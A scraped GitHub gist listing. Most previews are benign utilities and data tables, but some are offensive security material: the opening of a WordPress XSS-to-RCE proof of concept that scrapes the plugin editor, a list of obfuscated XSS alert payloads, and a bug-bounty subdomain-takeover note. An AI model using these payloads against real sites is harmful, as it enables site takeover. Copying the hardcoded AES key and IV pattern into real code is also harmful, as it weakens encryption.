Skip to content

Instantly share code, notes, and snippets.

View rainb3rry's full-sized avatar

rainb3rry

29 followers · 140 following
  • Portofino
View GitHub Profile
@TheBinitGhimire
TheBinitGhimire / README.md
Last active August 26, 2023 12:39
[Facebook Bug Bounty] Dangling DNS Records on surf-test.xwf.internet.org! - $500

Dangling DNS Records on surf-test.xwf.internet.org! - $500

Read the proper write-up here: https://publish.whoisbinit.me/amazon-ec2-dangling-dns-records-on-surf-test-xwf-internet-org!

Vulnerability Discovery

In this GitHub Gist, I have included my script (main.sh), which I used in discovering this vulnerability.

The script performs sub-domain enumeration over the Internet.org domain using assetfinder, subfinder, sublist3r and amass, and then checks for sub-domains which are further pointing to Amazon EC2 hostnames, and stores all of the results in multiple text files.

I didn't perform any form of manual work in discovering this vulnerability, and my workflow was fully automated with the help of Bash scripting using different tools.

@dmdboi
dmdboi / mysql_backup.js
Created September 11, 2020 22:52
A node.js script to backup a MySQL database using MySQLDump. Can be added to a node-cron timer to automate backups.
var fs = require('fs');
var spawn = require('child_process').spawn;
var wstream = fs.createWriteStream('dumpfilename.sql'); //Name of SQL dump file
var mysqldump = spawn('mysqldump', [
'-u',
'DB_USER',
'-p DB_PASSWORD',
'DB_NAME'
]);
@berkorbay
berkorbay / github_desktop_ubuntu.md
Last active November 14, 2024 08:31
To install Github Desktop for Ubuntu

IMPORTANT

See the following links for further updates to Github Desktop for Ubuntu. These are official instructions. (also mentioned by fetwar on Nov 3, 2023)

For the sake of "maintaining the tradition" here is the updated version.

@LukaSikic
LukaSikic / poc.js
Created May 19, 2019 21:32
WordPress XSS to RCE
u = "/wp-admin/plugin-editor.php"
p = "file=akismet%2Findex.php&plugin=akismet%2Fakismet.php"
var x = new XMLHttpRequest();
var r=0
x.open('GET',u+"?"+ p,1);
x.send(null);
x.onreadystatechange = function() {
if (x.readyState === 4 && r != 1) {
n = /ate.+".+\s+.+ue="(.*)" \/></.exec(x.responseText)[1]
@akhil-reni
akhil-reni / ssrf_iframe.svg
Created April 4, 2019 11:17
SVG Foreign Objects IFrame SSRF
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
@luislobo14rap
luislobo14rap / unserialize.js
Last active December 5, 2022 14:18
// unserialize.js v1.0.1
function unserialize(serialize) {
let obj = {};
serialize = serialize.split('&');
for (let i = 0; i < serialize.length; i++) {
thisItem = serialize[i].split('=');
obj[decodeURIComponent(thisItem[0])] = decodeURIComponent(thisItem[1]);
};
return obj;
};
@tomnomnom
tomnomnom / alert.js
Last active November 13, 2024 15:59
Ways to alert(document.domain)
// How many ways can you alert(document.domain)?
// Comment with more ways and I'll add them :)
// I already know about the JSFuck way, but it's too long to add (:
// Direct invocation
alert(document.domain);
(alert)(document.domain);
al\u0065rt(document.domain);
al\u{65}rt(document.domain);
window['alert'](document.domain);
@sidneys
sidneys / youtube_format_code_itag_list.md
Created January 20, 2018 11:12
YouTube video stream format codes itags

YouTube video stream format codes

Comprehensive list of YouTube format code itags

itag Code Container Content Resolution Bitrate Range VR / 3D
5 flv audio/video 240p - - -
6 flv audio/video 270p - - -
17 3gp audio/video 144p - - -
18 mp4 audio/video 360p - - -
22 mp4 audio/video 720p - - -
@siwalikm
siwalikm / aes-256-cbc.js
Last active October 20, 2024 09:44
AES-256-CBC implementation in nodeJS with built-in Crypto library
'use strict';
const crypto = require('crypto');
const ENC_KEY = "bf3c199c2470cb477d907b1e0917c17b"; // set random encryption key
const IV = "5183666c72eec9e4"; // set random initialisation vector
// ENC_KEY and IV can be generated as crypto.randomBytes(32).toString('hex');
const phrase = "who let the dogs out";
var encrypt = ((val) => {
@Biostate
Biostate / iller.js
Created December 8, 2017 18:39
Türkiye iller ve ilçeleri Array
var iller = {
"Ankara": ["Altındağ", "Ayaş", "Bala", "Beypazarı", "Çamlıdere", "Çankaya", "Çubuk", "Etimesgut", "Haymana", "Kalecik", "Keçiören", "Kızılcahamam", "Mamak", "Nallıhan", "Polatlı", "Şereflikoçhisar", "Sincan", "Yenimahalle"],
"İstanbul": ["Adalar", "Bağcılar", "Bahçelievler", "Bakırköy", "Beşiktaş", "Beykoz", "Beyoğlu", "Büyükçekmece", "Çatalca", "Eminönü", "Esenler", "Eyüp", "Fatih", "Gaziosmanpaşa", "Güngören", "Kadıköy", "Kağıthane", "Kartal", "Küçükçekmece", "Maltepe", "Pendik", "Sarıyer", "Silivri", "Şile", "Şişli", "Sultanbeyli", "Tuzla", "Ümraniye", "Üsküdar", "Zeytinburnu"],
"İzmir": ["Aliağa", "Balçova", "Bayındır", "Bergama", "Beydağ", "Bornova", "Buca", "Çeşme", "Dikili", "Foça", "Güzelbahçe", "Karaburun", "Karşıyaka", "Kemalpaşa", "Kınık", "Kiraz", "Konak", "Menderes", "Menemen", "Narlıdere", "Ödemiş", "Seferihisar", "Selçuk", "Tire", "Torbalı", "Urla"],
"Adana": ["Aladağ", "Ceyhan", "Feke", "Karaisalı", "Kozan", "Pozantı", "Saimbeyli", "Seyhan", "Yumurtalı", "Yüreğir"